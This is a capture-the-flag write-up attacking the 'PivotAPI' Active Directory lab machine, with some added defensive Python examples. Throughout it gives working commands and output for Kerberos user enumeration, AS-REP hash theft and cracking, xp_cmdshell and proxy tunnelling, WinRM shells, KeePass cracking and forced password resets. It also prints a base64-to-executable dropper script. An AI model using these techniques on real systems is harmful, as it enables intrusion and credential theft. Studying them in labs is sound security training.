
PivotAPI

Information Gathering

Target IP

10.129.236.84

Use fscan for an initial full port scan:

export ip=10.129.236.84
fscan -h $ip -p 1-65535

Port information

10.129.236.84:445 open
10.129.236.84:464 open
10.129.236.84:593 open
10.129.236.84:22 open
10.129.236.84:21 open
10.129.236.84:135 open
10.129.236.84:389 open
10.129.236.84:88 open
10.129.236.84:53 open
10.129.236.84:139 open
10.129.236.84:636 open
10.129.236.84:1433 open
10.129.236.84:3269 open
10.129.236.84:3268 open
10.129.236.84:9389 open

Service probing results

[*] NetInfo:
[*]10.129.236.84
   [->]PivotAPI
   [->]10.129.236.84
[+] ftp://10.129.236.84:21:anonymous 
   [->]10.1.1.414.6453.pdf
   [->]28475-linux-stack-based-buffer-overflows.pdf
   [->]BHUSA09-McDonald-WindowsHeap-PAPER.pdf
   [->]ExploitingSoftware-Ch07.pdf
   [->]notes1.pdf
   [->]notes2.pdf

Anonymous FTP access is enabled; mirror all of the files with wget -m ftp://anonymous@$ip:21

Check the EXIF metadata of all the PDF files:

exiftool *.pdf

Taking 10.1.1.414.6453.pdf as an example:

======== 10.1.1.414.6453.pdf
ExifTool Version Number         : 12.65
File Name                       : 10.1.1.414.6453.pdf
Directory                       : .
File Size                       : 103 kB
File Modification Date/Time     : 2021:02:19 14:06:00-05:00
File Access Date/Time           : 2024:01:07 06:29:24-05:00
File Inode Change Date/Time     : 2024:01:07 06:27:13-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.2
Linearized                      : No
Page Count                      : 23
Creator                         : Microsoft Word
Create Date                     : 10. February 2000 11:41
Title                           : Takanen
Author                          : Unknown
Producer                        : Acrobat PDFWriter 3.02 for Windows
Subject                         : 

The fields most likely to hold useful information are:

Publisher
Author
Creator

Extract these values and save each field's values to its own file.

Getting a Foothold

From the information exposed so far it is easy to infer that LicorDeBellota.htb is the target's domain, so we can try to enumerate domain users with kerbrute.

Username enumeration

Principle

Kerbrute is a tool that uses the Kerberos protocol to enumerate usernames.

Kerberos is a network authentication protocol that lets nodes on a network authenticate each other securely. In a Kerberos environment, users and services are authenticated with keys rather than passwords. When an authentication request is made for a username that does not exist, Kerberos returns the specific error KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN to signal an unknown principal, and that difference in response is what lets the tool determine whether a user exists.
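The same error is what a defender sees: every non-existent name kerbrute tries produces a TGT request failure that a domain controller records as Event ID 4768 with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and a wordlist run leaves one client producing many such failures for many different names within seconds. The following Python is an added example, not part of this write-up or of kerbrute: it runs a simple sliding-window detector over constructed sample records. The key=value line format, the client addresses and the names are assumptions made for the demo, not real DC output.

```python
"""Detector for Kerberos username enumeration (added example; constructed sample data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Result Code a DC writes into Event 4768 when the requested principal does not exist.
PRINCIPAL_UNKNOWN = "0x6"

# Constructed sample records in a simplified key=value form, not real DC output.
SAMPLE_LOG = """\
2024-01-07 06:59:20 EventID=4768 TargetUserName=kaorz IpAddress=10.10.14.5 Status=0x0
2024-01-07 06:59:21 EventID=4768 TargetUserName=aaron IpAddress=10.10.14.5 Status=0x6
2024-01-07 06:59:21 EventID=4768 TargetUserName=abbey IpAddress=10.10.14.5 Status=0x6
2024-01-07 06:59:22 EventID=4768 TargetUserName=abby IpAddress=10.10.14.5 Status=0x6
2024-01-07 06:59:22 EventID=4768 TargetUserName=abigail IpAddress=10.10.14.5 Status=0x6
2024-01-07 06:59:23 EventID=4768 TargetUserName=adam IpAddress=10.10.14.5 Status=0x6
2024-01-07 06:59:23 EventID=4768 TargetUserName=jari IpAddress=10.10.14.5 Status=0x0
2024-01-07 07:30:00 EventID=4768 TargetUserName=jhon IpAddress=10.129.236.50 Status=0x6
2024-01-07 07:30:01 EventID=4768 TargetUserName=jari IpAddress=10.129.236.50 Status=0x0
"""


def parse_line(line):
    """Split 'YYYY-mm-dd HH:MM:SS key=value ...' into a dict with a datetime under 'time'."""
    timestamp, rest = line[:19], line[20:]
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["time"] = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S")
    return fields


def detect_enumeration(log_text, window=timedelta(seconds=60), threshold=5):
    """Return {client_ip: max number of distinct unknown principals seen inside one
    window} for every client that reaches threshold. A user mistyping a name yields
    one or two 0x6 results; a wordlist run yields hundreds."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev["EventID"] == "4768" and ev["Status"] == PRINCIPAL_UNKNOWN:
            failures[ev["IpAddress"]].append((ev["time"], ev["TargetUserName"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start until the span fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {name for _, name in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: {count} unknown principals in 60s")
```

With the sample above only 10.10.14.5 is flagged; the single typo-like failure from 10.129.236.50 stays below the threshold. In a real deployment the source would be the Security log (or a SIEM query on EventID 4768 and Status 0x6) rather than constructed lines, and the threshold is tuned to the environment's normal typo rate.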

Usage

kerbrute userenum --domain LicorDeBellota.htb --dc $ip /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 500

2024/01/07 06:59:26 >  [+] VALID USERNAME:       jari@LicorDeBellota.htb
2024/01/07 07:06:18 >  [+] VALID USERNAME:       administrador@LicorDeBellota.htb
2024/01/07 07:22:29 >  [+] VALID USERNAME:       sshd@LicorDeBellota.htb

Based on the information gathered above, we can build a list of candidate usernames and save it to a file named usernames:

saif
byrongronseth
alex
Kaorz
jari
administrador
sshd

AS-REP Roasting

What we have so far is a set of usernames, so we try an AS-REP Roasting attack.

Principle

This is an attack technique against the Kerberos protocol that obtains a user's password hash without authenticating. It hinges on pre-authentication, the first step of Kerberos authentication, which is normally handled by the KDC's Authentication Server and exists to prevent brute-force attacks.

If a user account has "Do not require Kerberos preauthentication" enabled, an attacker can send an AS-REQ for that user and receive an AS-REP whose encrypted part is protected with the user's password hash, and that material can then be cracked offline. This attribute is not enabled by default.
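The attribute in question is the DONT_REQ_PREAUTH bit (0x400000) of the account's userAccountControl attribute. The following Python is an added example, not part of the original write-up: it decodes userAccountControl values from a constructed sample of (sAMAccountName, userAccountControl) pairs and lists the accounts an AS-REP Roasting attack would target, which is exactly the check a defender runs to find and fix exposed accounts. The account names and flag combinations are constructed for the demo; the bit values are those of the Active Directory schema.

```python
"""Find accounts exposed to AS-REP Roasting via userAccountControl (added example)."""

# Bits of the userAccountControl attribute used here (values from the AD schema).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000          # "Do not require Kerberos preauthentication"

UAC_FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Constructed sample of (sAMAccountName, userAccountControl) pairs, in the shape an
# LDAP query for those two attributes returns them. Names and values are made up.
SAMPLE_ACCOUNTS = [
    ("kaorz", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),
    ("jari", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),
    ("old.svc", NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE),
    ("administrador", NORMAL_ACCOUNT),
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAG_NAMES.items()) if value & bit]


def asrep_roastable(accounts, include_disabled=False):
    """Accounts whose AS-REQ the KDC answers without pre-authentication.
    Disabled accounts are skipped by default: the KDC refuses them with
    KDC_ERR_CLIENT_REVOKED before issuing anything crackable, so they are a
    hygiene finding rather than a live exposure."""
    found = []
    for sam, uac in accounts:
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(sam)
    return found


def ldap_filter_roastable():
    """Equivalent server-side LDAP filter: enabled user objects with the bit set.
    1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extensible match."""
    return (
        "(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH})"
        f"(!(userAccountControl:1.2.840.113556.1.4.803:={ACCOUNTDISABLE})))"
    )


if __name__ == "__main__":
    for sam, uac in SAMPLE_ACCOUNTS:
        print(f"{sam:15} 0x{uac:06x} {decode_uac(uac)}")
    print("exposed to AS-REP Roasting:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("LDAP filter:", ldap_filter_roastable())
```

ldap_filter_roastable() returns the query to run against a real directory instead of the constructed list. Clearing the flag (for example with Set-ADAccountControl -DoesNotRequirePreAuth $false from the ActiveDirectory PowerShell module) removes the exposure; for an account that must keep it, a long random password makes the offline crack shown later in this write-up impractical.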

Exploitation

  • Obtain the hash

Use GetNPUsers.py to retrieve the user's hash:

impacket-GetNPUsers -no-pass -dc-ip $ip LicorDeBellota.htb/ -usersfile usernames
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:94e9bff1534866b4b9ba642743f786d4$d329045548922264696a7ae8b964f903022a52463622a51efa5dd6343c039007af13f1c24950039936cd1a6a563af9622263545d12d03f5e3858264bf9d2a8bfbacd3a95d6eeccc86e2354ea88cfa68ecef792147e1b35f3b99ead60ef251a4b0925f6e298f3033c5e083d14c925e6cd87d6633be6a3717a3a8bae066868bd2a649e430f84e1ba29c2c8f467c6e40378b649fd2b3a62174f88cbd9667ec548df8f27605147d354e9be3afd0a0e1abf3d06b2e48d859eb64259d2f7221b0c65c00f7283f42788fb676da45999e92c1d64038db93da4505156772ee75f6b0e3e2404c31fa4c7af3be094818fa712f7b5e1f1bc22f17a9e25ed

We obtain the hash for the user Kaorz.

  • Crack the hash

Crack the hash with john and the rockyou wordlist:

john hash --wordlist=/usr/share/wordlists/rockyou.txt
Roper4155        ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB) 

Domain enumeration with BloodHound

Credentials: Kaorz:Roper4155

bloodhound-python -c ALL -u kaorz -p Roper4155 -d licordebellota.htb -dc licordebellota.htb -ns $ip --zip
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts

Open BloodHound, import the data, and review the domain information.

Logging in to services

Credentials: Kaorz:Roper4155

Try logging in to each of the exposed services.

Use crackmapexec to check what access the credentials give on SMB:

crackmapexec smb $ip -u Kaorz -p Roper4155 --shares
SMB         10.129.236.84   445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.129.236.84   445    PIVOTAPI         [+] LicorDeBellota.htb\Kaorz:Roper4155 
SMB         10.129.236.84   445    PIVOTAPI         [+] Enumerated shares
SMB         10.129.236.84   445    PIVOTAPI         Share           Permissions     Remark
SMB         10.129.236.84   445    PIVOTAPI         -----           -----------     ------
SMB         10.129.236.84   445    PIVOTAPI         ADMIN$                          Admin remota
SMB         10.129.236.84   445    PIVOTAPI         C$                              Recurso predeterminado
SMB         10.129.236.84   445    PIVOTAPI         IPC$            READ            IPC remota
SMB         10.129.236.84   445    PIVOTAPI         NETLOGON        READ            Recurso compartido del servidor de inicio de sesión 
SMB         10.129.236.84   445    PIVOTAPI         SYSVOL          READ            Recurso compartido del servidor de inicio de sesión 

Connect to the NETLOGON share with smbclient and download all the files in the HelpDesk directory:

smbclient -U LicorDebellota.htb/kaorz //$ip/netlogon

Reading the mail contents

msgconvert *.msg

Converting the .msg files to plain text and reading them shows that Restart-OracleService.exe is a program that logs in to the Oracle database and restarts the service, so it may well contain database login credentials.

Reverse engineering Restart-OracleService.exe

Check the file type:

file Restart-OracleService.exe

Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections

It is a Windows x64 console executable.

strings Restart-OracleService.exe

No database credentials show up in the strings output.

Searching strings in IDA turns up nothing either; there is no symbol table and no obviously useful information.

Use Process Monitor to observe the program's behaviour and look for something worth analysing.

Configure the filter, run the program, and inspect the process activity.

It creates the file C:\Users\V3g3t4ble\AppData\Local\Temp\B19C.tmp\B19D.tmp\B19E.bat and deletes it again after a series of operations.

Write a simple file-watching program to try to capture this file:

package main

import (
    "fmt"
    "log"
    "os"

    "github.com/fsnotify/fsnotify"
)

func main() {
    watcher, err := fsnotify.NewWatcher()
    if err != nil {
        log.Fatal(err)
    }
    defer watcher.Close()

    done := make(chan bool)
    go func() {
        for {
            select {
            case event, ok := <-watcher.Events:
                if !ok {
                    return
                }
                if event.Op&fsnotify.Write == fsnotify.Write {
                    // Read the file as soon as it is written, before the dropper deletes it.
                    data, err := os.ReadFile(event.Name)
                    if err != nil {
                        fmt.Println(err.Error())
                        continue
                    }
                    fmt.Println("captured file:", event.Name)
                    // O_WRONLY is required: O_APPEND|O_CREATE alone opens read-only and Write fails.
                    save, err := os.OpenFile("D:\\file.txt", os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
                    if err != nil {
                        fmt.Println(err.Error())
                        continue
                    }
                    if _, err = save.Write(data); err != nil {
                        fmt.Println(err.Error())
                    }
                    save.Close() // close right away rather than deferring inside the loop
                } else if event.Op&fsnotify.Create == fsnotify.Create {
                    fileInfo, err := os.Stat(event.Name)
                    if err != nil {
                        continue // already gone again
                    }
                    if fileInfo.IsDir() {
                        // fsnotify is not recursive: watch each new directory (the nested .tmp dirs)
                        _ = watcher.Add(event.Name)
                        fmt.Println("directory created:", event.Name)
                    } else if fileInfo.Mode().IsRegular() {
                        fmt.Println("file created:", event.Name)
                    }
                }
            case err, ok := <-watcher.Errors:
                if !ok {
                    return
                }
                fmt.Println("watcher error:", err)
            }
        }
    }()

    err = watcher.Add("C:\\Users\\V3g3t4ble\\AppData\\Local\\Temp")
    if err != nil {
        log.Fatal(err)
    }
    <-done // blocks forever; the watcher runs until the process is killed
}

Captured contents of the .bat file:

@shift /0
@echo off

if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error

:correcto

[content too long, omitted]
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt

echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe

:error

It is not hard to see that, after checking the username, the script writes base64 content to oracle.txt, converts it into restart-service.exe, runs it, and then deletes all the related files. To get hold of restart-service.exe for further analysis, modify the script:

@shift /0
@echo off

[content too long, omitted]
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> E:\\Code\oracle.txt

echo $salida = $null; $fichero = (Get-Content E:\\Code\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("E:\\Code\restart-service.exe", [System.Convert]::FromBase64String($salida)) > E:\\Code\monta.ps1
powershell.exe -exec bypass -file E:\\Code\monta.ps1

This yields restart-service.exe.
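The same result can be obtained statically, without running a modified copy of the dropper: the batch file only appends base64 lines to oracle.txt, and the PowerShell stage joins the lines, strips spaces and decodes them. The following Python is an added example, not part of the write-up, that performs that decoding offline on a constructed batch file of the same shape; the FAKE_PAYLOAD bytes are a stand-in with an MZ header, not the real restart-service.exe, and the function reports size, MZ check and SHA-256 of what it recovers so the sample can be triaged before anything is executed.

```python
"""Statically recover the payload a dropper batch file assembles (added example)."""
import base64
import hashlib
import re

# Constructed stand-in payload: a DOS 'MZ' header followed by filler, NOT a real executable.
FAKE_PAYLOAD = b"MZ\x90\x00\x03\x00\x00\x00" + b"CONSTRUCTED-SAMPLE-NOT-A-REAL-PE-" * 4

# Constructed batch file in the shape of the captured one: the base64 is appended in
# chunks to oracle.txt, then a PowerShell one-liner joins the lines and decodes them.
_B64 = base64.b64encode(FAKE_PAYLOAD).decode()
SAMPLE_BAT = (
    "@shift /0\n@echo off\n:correcto\n"
    + "".join(f"echo {_B64[i:i + 40]} >> c:\\programdata\\oracle.txt\n"
              for i in range(0, len(_B64), 40))
    + "echo $salida = $null; ... [System.Convert]::FromBase64String($salida)) > c:\\programdata\\monta.ps1\n"
    + "powershell.exe -exec bypass -file c:\\programdata\\monta.ps1\n"
    + "del c:\\programdata\\oracle.txt\n:error\n"
)

# Only lines that *append* (>>) to the staging file carry payload; the single '>'
# that writes monta.ps1 is deliberately not matched.
ECHO_APPEND = re.compile(r"^\s*echo\s+(.+?)\s*>>\s*(\S+)\s*$", re.IGNORECASE)


def extract_payload(bat_text, staging_name="oracle.txt"):
    """Reassemble and decode the base64 the batch file appends to staging_name,
    without executing anything. Raises ValueError if no payload lines are found
    or the joined text is not valid base64."""
    chunks = [
        m.group(1)
        for m in map(ECHO_APPEND.match, bat_text.splitlines())
        if m and m.group(2).lower().endswith(staging_name)
    ]
    if not chunks:
        raise ValueError(f"no 'echo ... >> {staging_name}' lines found")
    joined = "".join(chunks).replace(" ", "")   # the same normalisation monta.ps1 applies
    return base64.b64decode(joined, validate=True)


def describe(data):
    """Triage summary of the recovered bytes for a report or a sandbox submission."""
    return {
        "size": len(data),
        "mz_header": data[:2] == b"MZ",
        "sha256": hashlib.sha256(data).hexdigest(),
    }


if __name__ == "__main__":
    recovered = extract_payload(SAMPLE_BAT)
    print(describe(recovered))
```

Run against the real B19E.bat the function would return the bytes of restart-service.exe, which can then be hashed, scanned and loaded into a disassembler without ever being started; the username check at the top of the batch file is irrelevant to this path, since nothing is executed.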

Capturing the Oracle credentials with API Monitor

#   Type    Name    Pre-Call Value          Post-Call Value
    WCHAR           "svc_oracle"            "svc_oracle"
    WCHAR           "#oracle_s3rV1c3!2010"  "#oracle_s3rV1c3!2010"

MSSQL access

Looking at the domain, there is no Oracle at all; according to the mail, Oracle was replaced with MSSQL in 2020. Try the same naming pattern against MSSQL with the credentials svc_mssql:#mssql_s3rV1c3!2020:

impacket-mssqlclient "LicorDeBellota.htb/svc_mssql:#mssql_s3rV1c3\!2020@$ip" 

The login fails, so try the sa account instead.

Database shell obtained

Try running commands through xp_cmdshell:

SQL (sa  dbo@master)> enable_xp_cmdshell;
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa  dbo@master)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$sqlexpress   

NULL                          

Since the earlier mail said that tunnels over all protocols are blocked, try using mssqlproxy to get a foothold:

python3 mssqlproxy/mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip"
> enable_ole
> upload reciclador.dll C:\windows\temp\reciclador.dll
python3 mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip" -install -clr assembly.dll
python3 mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip" -start -reciclador 'C:\Windows\Temp\reciclador.dll'

Connect through the proxy with proxychains

Probe the WinRM service:

proxychains -q nmap -Pn -p 5985 127.0.0.1
5985/tcp open  wsman

Get a shell:

proxychains -q evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'

Lateral Movement

Obtaining SSH credentials

Download credentials.kdbx from the desktop and crack its master password:

keepass2john credentials.kdbx > credentials
john credentials --wordlist=/usr/share/rockyou.txt
mahalkita        (credentials)                                                                         

Open the database:

kpcli -kdb credentials.kdbx

An SSH credential is found:

show -f Database/Windows/SSH

This gives the credentials 3v4Si0N:Gu4nCh3C4NaRi0N!23. Port 22 was open in the earlier port scan, so connect over SSH and grab the user flag.

There is a Developers directory under C:\ that the current user cannot access.

net group /domain|findstr Developers

There is a Developers group:

net group Developers /domain

Its members are:

jari
superfime

Check the attack path in BloodHound.

Getting access as dr.zaiuss

Change the password and log in via WinRM:

net user 'dr.zaiuss' 'V3g3t4ble'
proxychains -q evil-winrm -i 127.0.0.1 -u 'dr.zaiuss' -p 'V3g3t4ble'

Getting access as superfume

net user 'superfume' 'V3g3t4ble'
proxychains -q evil-winrm -i 127.0.0.1 -u 'superfume' -p 'V3g3t4ble'

Getting access as Jari

We obtain Program.cs of restart-mssql.exe:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;

namespace restart_oracle
{
    class Program
    {
        public class RC4
        {

            public static byte[] Encrypt(byte[] pwd, byte[] data)
            {
                int a, i, j, k, tmp;
                int[] key, box;
                byte[] cipher;

                key = new int[256];
                box = new int[256];
                cipher = new byte[data.Length];

                for (i = 0; i < 256; i++)
                {
                    key[i] = pwd[i % pwd.Length];
                    box[i] = i;
                }
                for (j = i = 0; i < 256; i++)
                {
                    j = (j + box[i] + key[i]) % 256;
                    tmp = box[i];
                    box[i] = box[j];
                    box[j] = tmp;
                }
                for (a = j = i = 0; i < data.Length; i++)
                {
                    a++;
                    a %= 256;
                    j += box[a];
                    j %= 256;
                    tmp = box[a];
                    box[a] = box[j];
                    box[j] = tmp;
                    k = box[((box[a] + box[j]) % 256)];
                    cipher[i] = (byte)(data[i] ^ k);
                }
                return cipher;
            }

            public static byte[] Decrypt(byte[] pwd, byte[] data)
            {
                return Encrypt(pwd, data);
            }

            public static byte[] StringToByteArray(String hex)
            {
                int NumberChars = hex.Length;
                byte[] bytes = new byte[NumberChars / 2];
                for (int i = 0; i < NumberChars; i += 2)
                    bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
                return bytes;
            }

        }

        static void Main()
        {

            string banner = @"
    ____            __             __                               __
   / __ \___  _____/ /_____ ______/ /_   ____ ___  ______________ _/ /
  / /_/ / _ \/ ___/ __/ __ `/ ___/ __/  / __ `__ \/ ___/ ___/ __ `/ / 
 / _, _/  __(__  ) /_/ /_/ / /  / /_   / / / / / (__  |__  ) /_/ / /  
/_/ |_|\___/____/\__/\__,_/_/   \__/  /_/ /_/ /_/____/____/\__, /_/   
                                                             /_/      
                                                 by @HelpDesk 2020

";
            byte[] key = Encoding.ASCII.GetBytes("");
            byte[] password_cipher = { };
            byte[] resultado = RC4.Decrypt(key, password_cipher);
            Console.WriteLine(banner);
            Thread.Sleep(5000);
            System.Diagnostics.Process psi = new System.Diagnostics.Process();
            System.Security.SecureString ssPwd = new System.Security.SecureString();
            psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
            psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
            psi.StartInfo.RedirectStandardOutput = true;
            psi.StartInfo.UseShellExecute = false;
            psi.StartInfo.UserName = "Jari";
            string password = "";
            for (int x = 0; x < password.Length; x++)
            {
               ssPwd.AppendChar(password[x]);
            }
            password = "";
            psi.StartInfo.Password = ssPwd;
            psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            psi.Start();

        }
    }
}
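The recovered RC4 class is standard RC4: the key-scheduling loop, then the pseudo-random generation loop XORed over the data, with Decrypt simply calling Encrypt because the cipher is symmetric. The Python below is an added example, not the program's code: it ports that routine, checks it against a published RC4 test vector, and shows why a key stored in the same binary as the ciphertext offers no real protection, since anyone holding the executable can call the same function with the same constants. DEMO_KEY and the demo password are constructed values; the real key and cipher bytes are blanked in the listing above and are not reproduced here.

```python
"""RC4 as used by the recovered program, and why a hard-coded key protects nothing (added example)."""


def rc4(key: bytes, data: bytes) -> bytes:
    """Port of the recovered Encrypt(): KSA, then PRGA XORed over data. Decrypt == Encrypt."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    box = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm (first two loops in C#)
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:                          # pseudo-random generation + XOR (third loop in C#)
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def hex_to_bytes(hex_str: str) -> bytes:
    """Equivalent of the program's StringToByteArray() helper."""
    return bytes.fromhex(hex_str)


def self_test() -> bool:
    """Published RC4 test vector (key 'Key', plaintext 'Plaintext') confirms the port is correct."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


def recover_embedded_secret(key: bytes, cipher_hex: str) -> str:
    """What an analyst does with the binary: key and ciphertext are both constants in
    the program, so the 'protected' password is one function call away."""
    return rc4(key, hex_to_bytes(cipher_hex)).decode()


# Constructed demo values standing in for the blanked constants in the listing.
DEMO_KEY = b"constructed-demo-key"
DEMO_CIPHER_HEX = rc4(DEMO_KEY, b"not-the-real-password").hex()

if __name__ == "__main__":
    print("RC4 port matches the published vector:", self_test())
    print("embedded ciphertext:", DEMO_CIPHER_HEX)
    print("recovered:", recover_embedded_secret(DEMO_KEY, DEMO_CIPHER_HEX))
```

The point for whoever owns such a tool is that obfuscating a credential with a key that ships alongside it is not protection, and copying it into a SecureString afterwards does not undo the plain-text decrypt step that precedes it; a service that must restart another service under a different identity should use a managed service account or a credential store tied to the host rather than a password baked into the executable.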

Analyse the program with dnSpy.

A credential, Cos@Chung@!RPG, is dumped from memory; judging by where the password is used, it belongs to Jari, so connect via WinRM as Jari:Cos@Chung@!RPG:

proxychains -q evil-winrm -i 127.0.0.1 -u 'jari' -p 'Cos@Chung@!RPG'
